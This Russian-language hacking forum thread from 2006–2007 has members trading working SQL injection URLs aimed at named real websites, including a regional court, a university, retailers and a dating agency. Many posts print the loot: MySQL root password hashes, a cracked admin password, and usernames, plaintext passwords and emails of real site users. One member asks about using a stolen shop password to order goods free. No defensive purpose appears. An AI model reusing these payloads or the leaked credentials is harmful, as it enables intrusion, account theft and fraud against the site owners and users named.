SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. limpompo

    limpompo Новичок

    Joined:
    27 Aug 2005
    Messages:
    1,404
    Likes Received:
    308
    Reputations:
    453
    To V.I.P

    Code:
    root: 3616438873d71bd2
    ivax: 652fa1a75d18da89
    wx: 68708852333c8a5e
    pp: 1b112489580fbed1
    air: 2a98610a18cbfe30
    
    Поставил на расшифровку получил:
    Code:
    ivax:652fa1a75d18da89 - blaX
    air:2a98610a18cbfe30 - agFa41
    
    Продолжение Следует....
     
    2 people like this.
  2. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,325
    Likes Received:
    1,199
    Reputations:
    252
    Краснодарсикй краевой суд
    Таблицы: users
    Поле ток 1 нашел: password :)
    Code:
    http://webwork.agora-soft.ru/p.php?CATEGORY=-4+union+select+concat_ws(char(58),version(),user(),database())+from+users/*
    //Что-то меня по судам тянет =)
     
  3. V.I.P

    V.I.P Elder - Старейшина

    Joined:
    6 Apr 2007
    Messages:
    69
    Likes Received:
    45
    Reputations:
    -6
    И вот ещё одна:

    MTC - мож комута удастся выташить базу.

    PHP:
    http://www.recom.ru/mts/abonents/news/read/?id=-412+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(version(),0x73),0x73),4,5,6,7,8,9,10/*
     
  4. _Pantera_

    _Pantera_ Характерне козацтво

    Joined:
    6 Oct 2006
    Messages:
    187
    Likes Received:
    356
    Reputations:
    109
    Code:
    http://encycl.anthropology.ru/article.php?id=-3+union+select+1,concat(id,char(58),name,char(58),lastname),3,4,5,6,7,8,9,10+from+person+limit+0,1/*
    Code:
    http://www.oborudunion.ru/publications_st.php?id=1+and+1=-2+union+select+1,2,version(),4,id,6,7+from+ou_publications_st/*
    Code:
    http://www.indeks.ru/service.htm?id=-5+union+select+1,version(),3,4/*
    натариусы Москвы
    Code:
    http://www.mosdoma.ru/static_inf.php?id=-1+union+select+1,concat(user,char(58),password),3,4,5,6+from+mysql.user+limit+0,1/*
     
    #2004 _Pantera_, 19 Apr 2007
    Last edited: 19 Apr 2007
    3 people like this.
  5. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    nwags.ru
    Сайт одного из питерских универов (точнее, сайт "академии при президенте РФ")
    Code:
    http://www.nwags.ru/index.phtml?id_page=11&id=-1+union+select+1,2,concat(username,0x3a,user_password),4,5,6,7,8,9,10,11,12,13+from+acad_phpbb_users+limit+1,1/*
    admin:bbb8aae57c104cda40c93843ad5e6db8

    там 5я версия, кому интересно, можете посмотреть остальные таблицы) acad_users вроде есть.
     
    1 person likes this.
  6. XTErner

    XTErner Elder - Старейшина

    Joined:
    13 Mar 2007
    Messages:
    109
    Likes Received:
    135
    Reputations:
    40
    www.clubpoker.net
    Code:
    http://www.clubpoker.net/showpage/?id=-67+union+select+1,2,3,concat(username,0x3a,user_password,0x3a,version()),5+from+users+limit+2,1/*
    
    http://www.clubpoker.net/showpage/?id=-67+UNION+SELECT+1,2,3,table_name,5+from+INFORMATION_SCHEMA.TABLES+limit+41,1/*
     
  7. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,325
    Likes Received:
    1,199
    Reputations:
    252
    n1†R0x,
    md5 - bbb8aae57c104cda40c93843ad5e6db8
    pass - 111111111
     
  8. proZaik

    proZaik Banned

    Joined:
    11 Apr 2006
    Messages:
    15
    Likes Received:
    4
    Reputations:
    0
    www.incom-shina.ru
    Покупаем шины
    http://www.incom-shina.ru/catalog.php?model_id=-357%20union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*
     
    1 person likes this.
  9. [53x]Shadow

    [53x]Shadow Leaders of Antichat

    Joined:
    25 Jan 2007
    Messages:
    284
    Likes Received:
    597
    Reputations:
    514
    BIBIKA
    Вот мой первый скуль, толька кол-во столбцов подобрать не удалось((
    Code:
    http://www.bibika.ru/list.php?id=14380586+and+u ser()%3C%3E1
     
  10. V.I.P

    V.I.P Elder - Старейшина

    Joined:
    6 Apr 2007
    Messages:
    69
    Likes Received:
    45
    Reputations:
    -6
    Вот
    PHP:
    http://www.incom-shina.ru/catalog.php?model_id=-357+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(user,char(58),password)+from+mysql.user/*
    root:31145a7a1dc8740d


    Международное брачное агентство «Союз двух сердец»
    PHP:
    http://www.heartsunion.com/vopr-otv/index.php?id=-8+union+select+1,2,3,version(),4+from+news/*
    Вытенул только news
     
    #2010 V.I.P, 20 Apr 2007
    Last edited: 20 Apr 2007
  11. VampiRUS

    VampiRUS Elder - Старейшина

    Joined:
    31 Dec 2005
    Messages:
    210
    Likes Received:
    105
    Reputations:
    57
    root@localhost
     
    1 person likes this.
  12. Joker-jar

    Joker-jar Elder - Старейшина

    Joined:
    11 Mar 2007
    Messages:
    581
    Likes Received:
    205
    Reputations:
    37
    http://olympus.ru/about/news/2006/01/31/-1+union+select+1,2,3,4,5,6,version()--
     
  13. limpompo

    limpompo Новичок

    Joined:
    27 Aug 2005
    Messages:
    1,404
    Likes Received:
    308
    Reputations:
    453
    To V.I.P

    Code:
    http://www.incom-shina.ru/catalog.php?model_id=-357+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,  concat(user,char(58),password)+from+mysql.user/* 
    
    root:31145a7a1dc8740d - Расшифрованно и пасс: 518EA
     
    1 person likes this.
  14. s1mt

    s1mt Member

    Joined:
    18 Apr 2007
    Messages:
    15
    Likes Received:
    6
    Reputations:
    0
    http://www.diel.com.ua/folio/works.php?id=-48/**/union/**/select/**/1,2,3,4,5,6,AES_DECRYPT(AES_ENCRYPT(concat(database(),0x3a,version(),0x3a,user()),0x73),0x73),8,9,10/*#
     
    1 person likes this.
  15. zl0ba

    zl0ba ПсихолоГ

    Joined:
    10 Oct 2006
    Messages:
    393
    Likes Received:
    301
    Reputations:
    52
    medtorg.ru

    Code:
    http://www.medtorg.ru/podraz.php?id_num=-18+union+select+null,version(),null,null
    www.dentland.com.ua

    Code:
    http://www.dentland.com.ua/katFul.php?_ID=-14+union+select+1,2,concat(version(),char(58),user(),char(58),database()),4,5,6,7/*
     
    1 person likes this.
  16. V.I.P

    V.I.P Elder - Старейшина

    Joined:
    6 Apr 2007
    Messages:
    69
    Likes Received:
    45
    Reputations:
    -6
    karelinform.ru
    PHP:
    http://karelinform.ru/?id=-7488+union+select+1,2,3,4,5,6,AES_DECRYPT(AES_ENCRYPT(version(),0x73),0x73),8,9/*

    www.domkino.spb.ru-Кто-то выкладывал,но ч разрачил :)
    PHP:
    http://www.domkino.spb.ru/description.php?id=-258+union+select+1,2,concat(name,char(58),login,char(58),password,char(58),email),4,5,6,7,8,9,0,1,2,3,4,5,6,7+from+user/*
    Выцепляем лимитом.(+limit+4,1)
    Имя:логин:ПаСС:Mail
    Шурик:shurik:ahin:sshurik@online.ru
    Андрей:andrey:andrey:nag@parnas.spb.ru
    Sergh:ss:ss:sergh@finec.ru
    Джек-потрошитель:jack:jack:jack@mail.ru


    PHP:
    http://www.kinomaniac.ru/movie.php?id=1151'+union+select+1,2/*

    И ещё вапрос: Можно ли имея пасс shoop`а(магазина) заказать что небудь на-хал@ву?
     
  17. »Atom1c«

    »Atom1c« Banned

    Joined:
    4 Nov 2006
    Messages:
    234
    Likes Received:
    285
    Reputations:
    92
    www.nregion.com

    user - nregion@localhost
    database - wwwnregioncom
    version - 4.1.18

     
    1 person likes this.
  18. zl0ba

    zl0ba ПсихолоГ

    Joined:
    10 Oct 2006
    Messages:
    393
    Likes Received:
    301
    Reputations:
    52
    offtop:
    Пожалуйста юзайте Антибоян для темы "SQL иньекции"
    Created by Constantine!


    http://hlamidnik.h18.ru/SQLS.html

    Сам уже забаянил =(
     
  19. proZaik

    proZaik Banned

    Joined:
    11 Apr 2006
    Messages:
    15
    Likes Received:
    4
    Reputations:
    0
    Кто идет на выставку Interop?

    http://www.interop.ru/?page=newsview&id=-175%20union+select+1,1,1,1,1,1,1,1,1,1,1/*&offset=0&language=rus
     
  20. *D1VER

    *D1VER Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    108
    Likes Received:
    67
    Reputations:
    21
    http://thelist.ru/catalog.php?group=4&razdel=-1+union+select+table_name+from+information_schema.tables+limit+14,6/*


    Спешу на работу но если потрудиться можно фсё вытащить!

    http://www.interop.ru/?page=newsview&id=-175%20union+select+1,2,3,4,5,6,7,1,9,concat(name,char(58)),1+from+users+limit+0,1/*&offset=0&language=rus
     
    #2020 *D1VER, 20 Apr 2007
    Last edited: 20 Apr 2007
Loading...
Thread Status:
Not open for further replies.